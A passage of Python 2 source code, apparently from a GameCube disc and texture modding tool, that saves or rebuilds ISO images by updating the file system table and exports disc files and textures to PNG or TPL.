if thisFileName == 'start.dol':
# Move the FST. It must directly follow the DOL as its offset is the only indicator of the DOL file's size
isoBinary.seek( 0x424 )
isoBinary.write( toBytes( fstOffset ) )
fstLocationUpdated = True
# If this file is the FST, its size also needs to be updated in boot.bin
elif thisFileName == 'game.toc':
isoBinary.seek( 0x428 )
newFstSizeByteArray = toBytes( newFileSize )
isoBinary.write( newFstSizeByteArray ) # Writes the value for FST size
isoBinary.write( newFstSizeByteArray ) # Writes the value for max FST size (differs from above for multi-disc games?)
if thisFileName == 'start.dol' or thisFileName == 'game.toc':
# Remember that the header file was updated
if gcrSystemFiles: filesUpdated.append( gameId + '/iso.hdr' )
else: filesUpdated.append( gameId + '/boot.bin' )
else: # The file's size value needs to be updated in the FST
updateFstEntry( entries, targetFileOffset, newFileSize )
fstContentsUpdated = True
# Prepare some padding of zeros to go after the file, to remove any traces of the old file.
if newFileSize < originalFileSize:
padding = '00' * (originalFileSize - newFileSize)
# Write the new file (and trailing padding if needed) to the ISO
isoBinary.seek( targetFileOffset )
if source == 'ram':
isoBinary.write( bytearray.fromhex(data) )
else:
with open( data, 'rb' ) as externalFile: # fileData is actually a file path in this case.
for dataChunk in getInChunks( externalFile, 0, newFileSize, chunkSize ):
isoBinary.write( dataChunk )
isoBinary.write( bytearray.fromhex(padding) )
filesReplaced.append( isoPath.lower() )
if fstLocationUpdated or fstContentsUpdated:
# Reassemble the FST and write it back into the game
updatedFstData = ''.join( entries ) + '\x00'.join( strings ).encode('hex')
isoBinary.seek( fstOffset )
isoBinary.write( bytearray.fromhex(updatedFstData) )
if fstContentsUpdated: filesUpdated.append( gameId + '/game.toc' )
fileWriteSuccessful = True
except Exception as e:
print 'Error saving changes to disc (rebuild required = False);', e
else: # Build a new image, based on the folders and files in the GUI.
dataCopiedSinceLastUpdate = 0
#tic = time.clock() # for performance testing
# Generate a new FST based on the files shown in the GUI
newFstData = generateFST()
newNumberOfEntries, newEntries, newStrings = readFST( newFstData ) # Returns an int and two lists
try:
if buildingFromRootFolder: # This is a root folder that needs to be built into a disc image
# Try to get the shortTitle, for use as a default file name
if globalBannerFile:
if Gui.countryCode.get() == 'us': encoding = 'latin_1' # Decode assuming English or other European countries
else: encoding = 'shift_jis' # The country code is 'jp', for Japanese.
defaultDiscName = globalBannerFile.data[0x1820:(0x1820 + 0x20)].decode(encoding) + '.iso'
else:
defaultDiscName = gameId.upper() + '.iso'
# Prompt for a place to save the file, and a filename.
savePath = tkFileDialog.asksaveasfilename(
title="Choose a destination and file name to save these files as a new disc image.",
initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
initialfile=defaultDiscName,
defaultextension='.iso',
filetypes=[('Standard disc image', '*.iso'), ('GameCube disc image', '*.gcm'), ("All files", "*.*")])
if not savePath: return False, 0, 0
else: originalIsoBinary = open( discFilePath, 'rb' ) # Will only be reference when rebuilding an existing disc image.
def updateProgressDisplay( dataCopiedSinceLastUpdate ):
if dataCopiedSinceLastUpdate > guiUpdateInterval:
updateProgramStatus( 'Rebuilding ' + discExt + ' (' + str( round( (float(newIsoBinary.tell()) / projectedDiscSize) * 100, 1 ) ) + '%)' )
Gui.programStatusLabel.update()
return 0
else: return dataCopiedSinceLastUpdate
# Determine how much padding to add between files
fstFileSize = len( newFstData )/2
spaceForHeaderAndSystemFiles = fstOffset + roundTo32( fstFileSize, base=4 )
totalNonSystemFiles = 0
totalNonSystemFileSpace = 0
for entry in newEntries:
if entry[:2] == '00': # Means it's a file
totalNonSystemFiles += 1
thisEntryFileSize = int( entry[16:24], 16 )
totalNonSystemFileSpace += roundTo32( thisEntryFileSize, base=4 )
interFilePaddingLength = getInterFilePaddingLength( totalNonSystemFiles, spaceForHeaderAndSystemFiles + totalNonSystemFileSpace )
paddingSettingsValue = settings.get( 'General Settings', 'paddingBetweenFiles' ).lower()
# Create a new file to begin writing the new disc to, and calculate the size it will be expected to reach
backupFile = tempfile.NamedTemporaryFile( dir=os.path.dirname(discFilePath), suffix='.tmp', delete=False )
if buildingFromRootFolder and paddingSettingsValue == 'auto': projectedDiscSize = 1459978240
else: projectedDiscSize = spaceForHeaderAndSystemFiles + totalNonSystemFileSpace + totalNonSystemFiles * interFilePaddingLength
with open( backupFile.name, 'r+b' ) as newIsoBinary: # File opened in read/write binary mode
# Write the new ISO's system files
for systemFile in [ '/boot.bin', '/bi2.bin', '/apploader.ldr', '/start.dol' ]:
if gcrSystemFiles and systemFile == '/boot.bin': continue # Skip this and the next file in trade for iso.hdr if it is present.
elif gcrSystemFiles and systemFile == '/bi2.bin': systemFile = '/iso.hdr'
# Gather info on the source and destination for this file
iid = gameId + systemFile
description, entity, isoOffset, origFileSize, isoPath, source, data = Gui.isoFileTree.item( iid, 'values' )
thisFileOffset = int( isoOffset, 16 )
# Add padding prior to the file, if needed (likely shouldn't be though), to preserve offsets
currentFilePosition = newIsoBinary.tell()
if currentFilePosition < thisFileOffset:
sysFilePadding = '00' * ( thisFileOffset - currentFilePosition )
newIsoBinary.write( bytearray.fromhex(sysFilePadding) )
# Determine if this is a file being imported, or if it will be copied from the original ISO
if source == 'path': # In this case, the source is an external file.
newFileSize = os.path.getsize( data ) # data is a file path in this case
with open( data, 'rb' ) as newSystemFile:
# Write the file to the ISO in chunks (and update the status display)
for dataChunk in getInChunks( newSystemFile, 0, newFileSize, chunkSize ):
newIsoBinary.write( dataChunk )
dataCopiedSinceLastUpdate += len( dataChunk )
# This may take a while. Update the GUI's progress display.
dataCopiedSinceLastUpdate = updateProgressDisplay( dataCopiedSinceLastUpdate )
elif source == 'ram': # The data for this file is already loaded in the data variable, as a hex string
dataChunk = bytearray.fromhex( data )
newIsoBinary.write( dataChunk )
dataCopiedSinceLastUpdate += len( dataChunk )
# This may take a while. Update the GUI's progress display.
dataCopiedSinceLastUpdate = updateProgressDisplay( dataCopiedSinceLastUpdate )
else: # This file was not found in the files being imported (source == 'iso'). Use the system file from the original ISO.
originalIsoBinary.seek( thisFileOffset )
dataChunk = originalIsoBinary.read( int(origFileSize) )
newIsoBinary.write( dataChunk )
dataCopiedSinceLastUpdate += len( dataChunk )
# This may take a while. Update the GUI's progress display.
dataCopiedSinceLastUpdate = updateProgressDisplay( dataCopiedSinceLastUpdate )
if source != 'iso':
filesReplaced.append( isoPath.lower() )
# Prepare space for the FST. Add padding between it and the DOL (last file above) if needed, and create space where the full FST will later be placed.
currentFilePosition = newIsoBinary.tell()
fstPlaceholderPadding = '00' * ( fstOffset + fstFileSize - currentFilePosition )
newIsoBinary.write( bytearray.fromhex(fstPlaceholderPadding) )
# Write the new ISO's main file structure # Entry composition in the following loop, for both files and folders:
lowercaseIsoPath = gameId # gameId already lower case directoryFlag (1 byte) + stringTableOffset + hierarchicalOffset + length
dirEndIndexes = [newNumberOfEntries]
for index, entry in enumerate( newEntries[1:], start=1 ): # skips the root entry
# If the last directory being added to has been finished, remove the last directory from lowercaseIsoPath
while index == dirEndIndexes[-1]:
lowercaseIsoPath = '/'.join( lowercaseIsoPath.split('/')[:-1] )
dirEndIndexes.pop()
if entry[:2] == '01': # This entry is a folder (== 00 for a file)
lowercaseIsoPath += '/' + newStrings[ index - 1 ].lower()
# Remember how many entries are in this folder, so when that number is reached, that dirictory can be removed from lowercaseIsoPath
entryLength = int( entry[16:24], 16 )
dirEndIndexes.append( entryLength )
else:
# Add padding before this file, while ensuring that the file will be aligned to 4 bytes.
currentFilePosition = newIsoBinary.tell()
alignmentAdjustment = roundTo32( currentFilePosition, base=4 ) - currentFilePosition # i.e. how many bytes away from being aligned.
interFilePadding = '00' * ( alignmentAdjustment + interFilePaddingLength )
newIsoBinary.write( bytearray.fromhex(interFilePadding) )
#newEntries[ index ] = entry[:8] + "{0:0{1}X}".format( newIsoBinary.tell(), 8 ) + entry[16:24]
newEntryOffset = "{0:0{1}X}".format( newIsoBinary.tell(), 8 )
# Check if this file is to be copied to the new ISO from the original disc (when rebuilding an existing image), or will be replaced by one of the new files.
iid = lowercaseIsoPath + '/' + newStrings[ index - 1 ].lower()
description, entity, isoOffset, origFileSize, isoPath, source, data = Gui.isoFileTree.item( iid, 'values' )
if source == 'path': # The data variable is a file path in this case.
newFileSize = os.path.getsize( data )
# Write the file to the new ISO (copying in chunks if it's a large file).
with open( data, 'rb' ) as externalFile:
for dataChunk in getInChunks( externalFile, 0, newFileSize, chunkSize ):
newIsoBinary.write( dataChunk )
dataCopiedSinceLastUpdate += len( dataChunk )
# Update the GUI's progress display.
dataCopiedSinceLastUpdate = updateProgressDisplay( dataCopiedSinceLastUpdate )
# Update this entry with its new offset and size
newEntries[ index ] = entry[:8] + newEntryOffset + "{0:0{1}X}".format( newFileSize, 8 )
elif source == 'ram': # The data variable is file data (a hex string) in this case.
newFileSize = len( data )/2
# Write the file to the new ISO
newIsoBinary.write( bytearray.fromhex(data) )
dataCopiedSinceLastUpdate += newFileSize
# Update the GUI's progress display.
dataCopiedSinceLastUpdate = updateProgressDisplay( dataCopiedSinceLastUpdate )
# Update this entry with its new offset and size
newEntries[ index ] = entry[:8] + newEntryOffset + "{0:0{1}X}".format( newFileSize, 8 )
else: # The file for this entry will be from the original ISO (source == 'iso').
origFileOffset = int( entry[8:16], 16 )
origFileSize = int( entry[16:24], 16 )
# Write the file to the new ISO (copying in chunks if it's a large file).
#print 'writing internal file', iid, 'to', hex( newIsoBinary.tell() )
for dataChunk in getInChunks( originalIsoBinary, origFileOffset, origFileSize, chunkSize ):
newIsoBinary.write( dataChunk )
dataCopiedSinceLastUpdate += len( dataChunk )
# Update the GUI's progress display.
dataCopiedSinceLastUpdate = updateProgressDisplay( dataCopiedSinceLastUpdate )
# Update this entry with its new offset
newEntries[ index ] = entry[:8] + newEntryOffset + entry[16:24]
if source != 'iso':
if isoOffset == '0': filesAdded.append( isoPath.lower() )
else: filesReplaced.append( isoPath.lower() )
# If auto padding was used, there should be a bit of padding left over to bring the file up to the standard GameCube disc size.
if buildingFromRootFolder and paddingSettingsValue == 'auto':
finalPadding = '00' * ( 1459978240 - int(newIsoBinary.tell()) )
newIsoBinary.write( bytearray.fromhex(finalPadding) )
# Now that all files have been written and evaluated, the new FST is ready to be assembled and written into the ISO.
updatedFstData = ''.join( newEntries ) + '\x00'.join( newStrings ).encode('hex')
newIsoBinary.seek( fstOffset )
newIsoBinary.write( bytearray.fromhex(updatedFstData) )
filesUpdated.append( gameId + '/game.toc' )
# Update the offset and size of the DOL and FST in boot.bin/iso.hdr
newIsoBinary.seek( 0x424 )
#newIsoBinary.write( toBytes( dolOffset ) ) # old slower method: bytearray.fromhex( "{0:0{1}X}".format(dolOffset, 8) )
newIsoBinary.write( toBytes( fstOffset ) )
newFstSizeBytes = toBytes( len(updatedFstData)/2 )
newIsoBinary.write( newFstSizeBytes ) # Writes the value for FST size
newIsoBinary.write( newFstSizeBytes ) # Writes the value for max FST size (the Apploader will be displeased if this is less than FST size)
# Remember that this file was updated
if gcrSystemFiles: filesUpdated.append( gameId + '/iso.hdr' )
else: filesUpdated.append( gameId + '/boot.bin' )
Gui.programStatusLabel.update() # Should show that sweet '100%' completion for a moment.
fileWriteSuccessful = True
except Exception as e:
print 'Error saving changes to disc (rebuild required = True);', e
# toc = time.clock()
# print 'Time to rebuild disc:', toc-tic
# Close files that may have been opened
if backupFile: backupFile.close()
if originalIsoBinary: originalIsoBinary.close() # not buildingFromRootFolder and
if not fileWriteSuccessful:
updateProgramStatus( 'Disc Save Error' )
if backupFile and os.path.exists( backupFile.name ): os.remove( backupFile.name ) # Delete the back-up file.
if buildingFromRootFolder: message = "Unable to build the disc."
else: message = "Unable to save or import into the " + discExt + ". \n\nBe sure that it is not being used by another \nprogram (like Dolphin :P)."
if tkMessageBox.askretrycancel( 'Problem While Saving', message ):
fileWriteSuccessful, filesReplaced, filesAdded = saveDiscChanges( newDiscPath )
else: # Save was successful
# Update the program status
updateStatus = False # Prevents the status from changing when the disc is reloaded, except in a special case below.
unsavedDiscChanges = []
if globalDatFile: globalDatFile.unsavedChanges = []
updateProgramStatus( 'Save Successful' )
# Change the background color of any edited entry widgets back to white. (Image Data Headers, Texture Struct properties, etc.) back to white.
if globalBannerFile and globalBannerFile.source == 'disc':
restoreEditedEntries( editedBannerEntries )
if globalDatFile and globalDatFile.source == 'disc':
restoreEditedEntries( editedDatEntries )
# If the disc needed to be rebuilt, there are new disc files that need to be renamed
if needsRebuilding:
if buildingFromRootFolder:
# Rename the backup file to the selected name (removing/replacing any existing file by that name).
try:
if os.path.exists( savePath ):
os.remove( savePath )
except:
msg( 'The file to replace could not be overwritten.\n\n'
"This can happen if the file is locked for editing (for example, if it's open in another program)." )
return False, 0, 0
os.rename( backupFile.name, savePath )
discFilePath = savePath
# If using the 'Save Disc As...' option
elif newDiscPath:
# Set the new disc path, and delete any existing file
try:
if os.path.exists( newDiscPath ):
os.remove( newDiscPath )
except:
msg( 'The file to replace could not be overwritten.\n\n'
"This can happen if the file is locked for editing (for example, if it's open in another program)." )
return False, 0, 0
# Move/rename the new (temp) file to the specified directory/name
os.rename( backupFile.name, newDiscPath )
discFilePath = newDiscPath
elif generalBoolSettings['backupOnRebuild'].get():
# Create a new, unique file name for the backup, with a version number based on the source file. e.g. '[original filename] - Rebuilt, v1.iso'
discFileName = os.path.basename( discFilePath )
if 'Rebuilt, v' in discFileName:
newIsoFilepath = discFilePath
else:
newIsoFilepath = discFilePath[:-4] + ' - Rebuilt, v1' + discExtOriginal
# Make sure this is a unique (new) file path
if os.path.exists( newIsoFilepath ):
nameBase, _, version = newIsoFilepath[:-4].rpartition( 'v' ) # Splits on last instance of the delimiter (once)
if '.' in version: # e.g. "1.3"
# Get the most minor number in the version
versionBase, _, _ = version.rpartition( '.' )
newIsoFilepath = '{}v{}.1{}'.format( nameBase, versionBase, discExtOriginal )
newMinorVersion = 2
while os.path.exists( newIsoFilepath ):
newIsoFilepath = '{}v{}.{}{}'.format( nameBase, versionBase, newMinorVersion, discExtOriginal )
newMinorVersion += 1
else: # Single number version
newIsoFilepath = '{}v1{}'.format( nameBase, discExtOriginal )
newMajorVersion = 2
while os.path.exists( newIsoFilepath ):
newIsoFilepath = '{}v{}{}'.format( nameBase, newMajorVersion, discExtOriginal )
newMajorVersion += 1
# Rename the backup file to the above name.
os.rename( backupFile.name, newIsoFilepath )
# Inform the user that a backup was created, and prompt if they'd like to switch to it.
if tkMessageBox.askyesno( 'Load Back-up?', 'The rebuilt disc was saved as a back-up. Would you like to load it now?' ):
updateStatus = True
discFilePath = newIsoFilepath
# Performing a basic save (no back-ups)
else:
# Rename the original file, rename the back-up to the original file's name. Then, if successful, delete the original file.
try:
os.rename( discFilePath, discFilePath + '.bak' ) # Change the name of the original file so the new file can be named to it. Not deleted first in case the op below fails.
os.rename( backupFile.name, discFilePath ) # Rename the new 'back-up' file to the original file's name.
os.remove( discFilePath + '.bak' ) # Delete the original file.
except:
msg('A back-up file was successfully created, however there was an error while attempting to rename the files and remove the original.\n\n'
"This can happen if the original file is locked for editing (for example, if it's open in another program).")
return False, 0, 0
if fileWriteSuccessful:
# Reload the file to get the new properties, such as file offsets and sizes, and to reset descriptions and source info.
if buildingFromRootFolder: updatedFiles = None # No reason to highlight all the files; it's implied they're all "new/updated" since it's a new disc.
else: updatedFiles = filesReplaced + filesAdded + filesUpdated
rememberFile( discFilePath, False )
globalDiscDetails['isoFilePath'] = discFilePath
scanDisc( updateStatus, preserveTreeState=True, switchTab=False, updatedFiles=updatedFiles )
# Warn the user if an ISO is too large for certain loaders
isoByteSize = os.path.getsize( discFilePath )
if isoByteSize > 1459978240: # This is the default/standard size for GameCube discs.
msg( 'The disc is larger than the standard size for GameCube discs (which is ~1.36 GB, or 1,459,978,240 bytes). This will be a problem for Nintendont, but discs up to 4 GB '
'should still work fine for both Dolphin and DIOS MIOS. (Dolphin may still play discs larger than 4 GB, but some features may not work.)', 'Standard Disc Size Exceeded' )
return fileWriteSuccessful, filesReplaced, filesAdded # files replaced will always count the FST if a rebuild was required
def saveDatAs(): # Will overwrite an existing file, or create a new file if one does not exist.
if not globalDatFile:
msg( "This operation is for a DAT file that has already been loaded in the DAT Texture Tree tab. "
"If you'd like to save a file that's in a disc to a standalone file, use the 'Export' feature." )
else:
# Prompt for a place to save the new DAT file.
saveDataToFileAs( globalDatFile.getFullData(), globalDatFile )
def saveBannerAs(): # Will overwrite an existing file, or create a new file if one does not exist.
if not globalBannerFile:
msg( "This operation is for a banner file that has already been loaded in the Disc Details tab. "
"If you'd like to save a file that's in a disc to a standalone file, use the 'Export' feature." )
else:
# Prompt for a place to save the new banner file.
saveDataToFileAs( globalBannerFile.data, globalBannerFile )
def saveDataToFileAs( datData, datFile ):
# Prompt for a place to save the file.
ext = os.path.splitext( datFile.fileName )[1].replace('.', '')
savePath = tkFileDialog.asksaveasfilename(
title="Where would you like to export the file?",
initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
initialfile=datFile.fileName,
defaultextension=ext,
filetypes=[( ext.upper() + " files", '*.' + ext.lower() ), ( "All files", "*.*" )] ) #confirmoverwrite ?
if savePath:
# Update the default directory to start in when opening or exporting files.
dirPath = os.path.dirname( savePath )
settings.set( 'General Settings', 'defaultSearchDirectory', dirPath )
with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )
saveSuceeded = writeDatFile( savePath, datData, 'Save', datFile )
# If the operation was a success, update the filepaths to the newly created file
if saveSuceeded:
origFileName = datFile.fileName
newFileName = os.path.basename( savePath )
# Update internal class references
datFile.path = savePath
datFile.source = 'file'
datFile.fileName = newFileName
# Update external references (shown on the GUI)
Gui.datDestination.set( savePath )
if len( newFileName ) > 30: newFileName = newFileName[:27] + '...'
Gui.fileStructureTree.heading( '#0', anchor='center', text=newFileName ) # SA tab
# If the new file's name is displayed in the SA tab's property pane, update that too
structPropertiesChildren = Gui.structurePropertiesFrame.interior.winfo_children()
if structPropertiesChildren:
labelWidget = structPropertiesChildren[0]
if labelWidget.winfo_class() == 'TLabel' and labelWidget['text'] == origFileName:
labelWidget['text'] = newFileName
# Add the new file to the recent files menu
#rememberFile( savePath )
def getDiscPath( iid, isoPath='', includeRoot=True ):
""" Builds a disc path, like isoPath, but includes convenience folders if they are turned on. """
if not isoPath:
isoPath = Gui.isoFileTree.item( iid, 'values' )[-3]
if generalBoolSettings['useDiscConvenienceFolders'].get():
# Scan for 'convenience folders' (those not actually in the disc), and add them to the path; they won't exist in isoPath
root = globalDiscDetails['gameId'].lower()
isoParts = isoPath.split( '/' )
pathParts = [ isoParts[-1] ] # A list, starting with just the filename
parentIid = Gui.isoFileTree.parent( iid )
while parentIid != root:
parentFolderText = Gui.isoFileTree.item( parentIid, 'text' ).strip()
for character in ( '\\', '/', ':', '*', '?', '"', '<', '>', '|' ): # Remove illegal characters
parentFolderText = parentFolderText.replace( character, '-' )
pathParts.insert( 0, parentFolderText )
parentIid = Gui.isoFileTree.parent( parentIid )
if includeRoot:
pathParts.insert( 0, isoParts[0] )
return '/'.join( pathParts )
elif not includeRoot:
return '/'.join( isoPath.split('/')[1:] ) # Removes the GameID
else:
return isoPath
def exportItemsInSelection( selection, iidSelectionsTuple, isoBinary, directoryPath, exported, failedExports ):
""" Basically just a recursive helper function to exportIsoFiles(). """
for iid in selection:
# Prevent files from being exported twice depending on user selection
if (selection != iidSelectionsTuple) and iid in iidSelectionsTuple:
continue
#if initialSelection or iid not in iidSelectionsTuple:
_, entity, isoOffset, fileSize, isoPath, source, data = Gui.isoFileTree.item( iid, 'values' )
if entity == 'file':
Gui.programStatus.set( 'Exporting File ' + str(exported + failedExports + 1) + '....' )
Gui.programStatusLabel.update()
try:
# Retrieve the file data.
if source == 'iso':
isoBinary.seek( int(isoOffset, 16) )
datData = bytearray( isoBinary.read( int(fileSize) ) )
elif source == 'ram':
datData = bytearray.fromhex( data )
else: # source == 'path', meaning data is a filepath to an external file
with open( data, 'rb') as externalFile:
datData = bytearray( externalFile.read() )
# Construct a file path for saving, and destination folders if they don't exist
savePath = directoryPath + '/' + getDiscPath( iid, isoPath, includeRoot=False )
createFolders( os.path.split(savePath)[0] )
# Save the data to a new file.
with open( savePath, 'wb') as newFile:
newFile.write( datData )
exported += 1
except:
failedExports += 1
else: # Item is a folder.
exported, failedExports = exportItemsInSelection( Gui.isoFileTree.get_children(iid), iidSelectionsTuple, isoBinary, directoryPath, exported, failedExports )
return exported, failedExports
def exportIsoFiles():
if not discDetected(): return
iidSelectionsTuple = Gui.isoFileTree.selection()
if not iidSelectionsTuple:
updateProgramStatus( 'Eh?' )
msg( 'Please first select a file or folder to export.' )
return
elif globalDiscDetails['isoFilePath'] == '' or not os.path.exists( globalDiscDetails['isoFilePath'] ):
updateProgramStatus( 'Export Error' )
msg( "Unable to find the disc image. Be sure that the file path is correct and that the file has not been moved or deleted.", 'Disc Not Found' )
return
_, entity, isoOffset, fileSize, isoPath, source, data = Gui.isoFileTree.item( iidSelectionsTuple[0], 'values' )
# Check the selection to determine if a single or multiple files need to be exported
if len( iidSelectionsTuple ) == 1 and entity == 'file':
# Prompt for a place to save the file.
fileName = '-'.join( isoPath.split('/')[1:] ) # Removes the GameID, and separates directories with dashes
ext = os.path.splitext( fileName )[1].replace('.', '')
savePath = tkFileDialog.asksaveasfilename(
title="Where would you like to export the file?",
initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
#initialfile=filenameWithNoExt + ' (from ' + isoFilenameWithNoExt + ')',
initialfile=fileName,
defaultextension=ext,
filetypes=[( ext.upper() + " files", '*.' + ext.lower() ), ( "All files", "*.*" )] ) #confirmoverwrite ?
# If the above wasn't canceled and returned a path, use that to save the file
if savePath:
directoryPath = os.path.dirname( savePath ) # Used at the end of this function
# Get the file's data and write it to an external file
datData = getFileDataFromDiscTreeAsBytes( iidValues=(entity, isoOffset, fileSize, source, data) )
writeDatFile( savePath, datData, 'Export' )
else: directoryPath = ''
else: # Multiple files selected to be exported. Prompt for a directory to save them to.
directoryPath = tkFileDialog.askdirectory(
title='Where would you like to save these files?',
initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
parent=Gui.root,
mustexist=True )
if directoryPath != '':
exported = 0
failedExports = 0
with open( globalDiscDetails['isoFilePath'], 'rb') as isoBinary:
exported, failedExports = exportItemsInSelection( iidSelectionsTuple, iidSelectionsTuple, isoBinary, directoryPath, exported, failedExports )
if failedExports == 0: updateProgramStatus( 'Export Successful' )
else:
updateProgramStatus( 'Failed Exports' ) # writeDatFile will otherwise update this with success.
if exported > 0:
msg( str(exported) + ' files exported successfully. However, ' + str(failedExports) + ' files failed to export.' )
else: msg( 'Unable to export.' )
if directoryPath:
# Update the default directory to start in when opening or exporting files.
settings.set( 'General Settings', 'defaultSearchDirectory', directoryPath )
with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )
def exportTexturesInSelection( selection, iidSelectionsTuple, isoBinary, chosenSaveDirectory, exported, failedExports, exportFormat ):
""" Basically just a recursive helper function to exportSelectedFileTextures(). """
for iid in selection:
# Prevent files from being exported twice depending on user selection
if (selection != iidSelectionsTuple) and iid in iidSelectionsTuple:
continue
_, entity, _, _, isoPath, _, _ = Gui.isoFileTree.item( iid, 'values' )
if entity == 'file':
Gui.programStatus.set( 'Exporting from file ' + str(exported + len(failedExports) + 1) + '....' )
Gui.programStatusLabel.update()
try:
# Initialize the file and collect textures from it
fileData = getFileDataFromDiscTreeAsBytes( iid )
datFile = hsdFiles.datFileObj( source='disc' )
datFile.load( iid, fileData, os.path.basename(isoPath) )
# Skip unrecognized files (or those appearing to have unreasonable basic features)
if datFile.headerInfo['rootNodeCount'] > 300 or datFile.headerInfo['referenceNodeCount'] > 300 or datFile.headerInfo['rtEntryCount'] > 45000:
print 'Skipping texture export from', iid + '; unreasonable file'
failedExports.append( isoPath.split('/')[-1] )
continue
elif len( datFile.rtData ) > 200000:
print 'Skipping texture export from', iid + '; unrecognized file'
failedExports.append( isoPath.split('/')[-1] )
continue
# Construct the file path and create any folders needed
saveDirectory = chosenSaveDirectory + '/' + getDiscPath( iid, isoPath, includeRoot=False )
createFolders( saveDirectory )
# Export all textures that can be found in this file
for imageDataOffset, _, _, _, width, height, imageType, _ in identifyTextures( datFile ):
# Get the image data
imageDataLength = hsdStructures.ImageDataBlock.getDataLength( width, height, imageType )
imageData = datFile.getData( imageDataOffset, imageDataLength )
# Add the texture file name to the save path
textureDetails = ( imageDataOffset, imageDataLength, width, height, imageType )
savePath = saveDirectory + '/' + constructTextureFilename( datFile, iid, textureDetails=textureDetails ) + '.' + exportFormat
# Collect any palette data
if imageType == 8 or imageType == 9 or imageType == 10:
paletteData, paletteType = getPaletteData( datFile, imageDataOffset, imageData=imageData, imageType=imageType )
if not paletteData:
print 'Skipping', iid + '; a color palette could not be found'
continue
else:
paletteData = ''
paletteType = None
# Save the image to file
if exportFormat == 'tpl':
tplImage = tplEncoder( imageDimensions=(width, height), imageType=imageType, paletteType=paletteType )
tplImage.encodedImageData = imageData
tplImage.encodedPaletteData = paletteData
tplImage.createTplFile( savePath )
elif exportFormat == 'png': # Decode the image data
pngImage = tplDecoder( '', (width, height), imageType, paletteType, imageData, paletteData )
pngImage.deblockify()
pngImage.createPngFile( savePath, creator='DTW - v' + programVersion )
exported += 1
except Exception as err:
print 'Failed exporting textures from', iid
print err
failedExports.append( isoPath.split('/')[-1] )
else: # Item is a folder.
exported, failedExports = exportTexturesInSelection( Gui.isoFileTree.get_children(iid), iidSelectionsTuple, isoBinary, chosenSaveDirectory, exported, failedExports, exportFormat )
return exported, failedExports
def exportSelectedFileTextures():
""" Exports all textures within all selected files/folders in the Disc File Tree. """
if not discDetected(): return
# Get and validate the export format to be used.
exportFormat = settings.get( 'General Settings', 'textureExportFormat' ).lower().replace( '.', '' )
if exportFormat != 'png' and exportFormat != 'tpl':
msg( 'The default export format setting (textureExportFormat) is invalid! The format must be PNG or TPL.' )
return
iidSelectionsTuple = Gui.isoFileTree.selection()
if not iidSelectionsTuple:
updateProgramStatus( 'Eh?' )
msg( 'Please first select a file or folder to export.' )
return
elif globalDiscDetails['isoFilePath'] == '' or not os.path.exists( globalDiscDetails['isoFilePath'] ):
updateProgramStatus( 'Export Error' )
msg( "Unable to find the disc image. Be sure that the file path is correct and that the file has not been moved or deleted.", 'Disc Not Found' )
return
# Prompt for a directory to save them to.
chosenSaveDirectory = tkFileDialog.askdirectory(
title='Where would you like to save these textures?',
initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
parent=Gui.root,
mustexist=True )
if chosenSaveDirectory != '':
exported = 0
failedExports = []
with open( globalDiscDetails['isoFilePath'], 'rb') as isoBinary:
exported, failedExports = exportTexturesInSelection( iidSelectionsTuple, iidSelectionsTuple, isoBinary, chosenSaveDirectory, exported, failedExports, exportFormat )
if len( failedExports ) == 0:
updateProgramStatus( 'Export Successful' )
else:
updateProgramStatus( 'Failed Exports' ) # writeDatFile will otherwise update this with success.
if exported > 0:
msg( str(exported) + ' files exported their textures successfully. However, these files failed their export:\n\n' + '\n'.join(failedExports) )
else: msg( 'Unable to export.' )
# Update the default directory to start in when opening or exporting files.
settings.set( 'General Settings', 'defaultSearchDirectory', chosenSaveDirectory )
with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )
def writeDatFile( savePath, datData, operation, datFileObj=None ):
# Do da ting.
try:
with open( savePath, 'wb') as newFile:
newFile.write( datData )
if datFileObj:
# Record that the changes have been saved.
datFileObj.unsavedChanges = []
if savePath.lower().endswith( '.bnr' ):
restoreEditedEntries( editedBannerEntries )
else:
restoreEditedEntries( editedDatEntries )
# Update the program status.
updateProgramStatus( operation + ' Successful' )
successStatus = True
except:
updateProgramStatus( operation + ' Error' )
fileExt = os.path.splitext( savePath )[1].upper()
msg( "There was an unknown problem while creating the {} file.".format(fileExt) )
successStatus = False
return successStatus
def constructTextureFilename( datFile, iid='', filepath='', textureDetails=(), forceDolphinHash=False ):
""" Generates a file name for textures exported from DAT files (not used for banners).
The file extension is not included. """
# Validate the input
if not iid and not filepath:
msg( 'constructTextureFilename requires an iid or filepath!' )
return ''
# Get or unpack information on the texture
if not textureDetails: textureDetails = parseTextureDetails( iid )
imageDataOffset, imageDataLength, width, height, imageType = textureDetails
if not forceDolphinHash and not generalBoolSettings['useDolphinNaming'].get(): # Use DTW's standard naming convention
filename = '{}_0x{:X}_{}'.format( datFile.fileName, 0x20+imageDataOffset, imageType )
else: # Use Dolphin's file naming convention
mipmapLevel = getMipmapLevel( iid )
# Generate a hash on the encoded texture data
imageData = datFile.getData( imageDataOffset, imageDataLength )
tex_hash = xxhash.xxh64( bytes(imageData) ).hexdigest() # Requires a byte string; can't use bytearray
# Generate a hash on the encoded palette data, if it exists
if imageType == 8 or imageType == 9 or imageType == 10:
# Get the palette data, and generate a hash from it
paletteData = getPaletteData( datFile, imageDataOffset, imageData=imageData, imageType=imageType )[0]
tlut_hash = '_' + xxhash.xxh64( bytes(paletteData) ).hexdigest() # Requires a byte string; can't use bytearray
else:
tlut_hash = ''
# Format mipmap flags
if mipmapLevel == -1: # Not a mipmaped texture
# Assemble the finished filename, without file extension
filename = 'tex1_' + str(width) + 'x' + str(height) + '_' + tex_hash + tlut_hash + '_' + str(imageType)
else:
if mipmapLevel > 0:
mipLevel = '_mip' + str( mipmapLevel )
else: mipLevel = ''
# Assemble the finished filename, without file extension
filename = 'tex1_' + str(width) + 'x' + str(height) + '_m_' + tex_hash + tlut_hash + '_' + str(imageType) + mipLevel
return filename
def exportTextures( exportAll=False ):
""" Exports some (what's selected) or all textures from the DAT Texture Tree. """
# Get a list of the items in the treeview to export
if exportAll:
iidSelectionsTuple = Gui.datTextureTree.get_children()
else: iidSelectionsTuple = Gui.datTextureTree.selection()
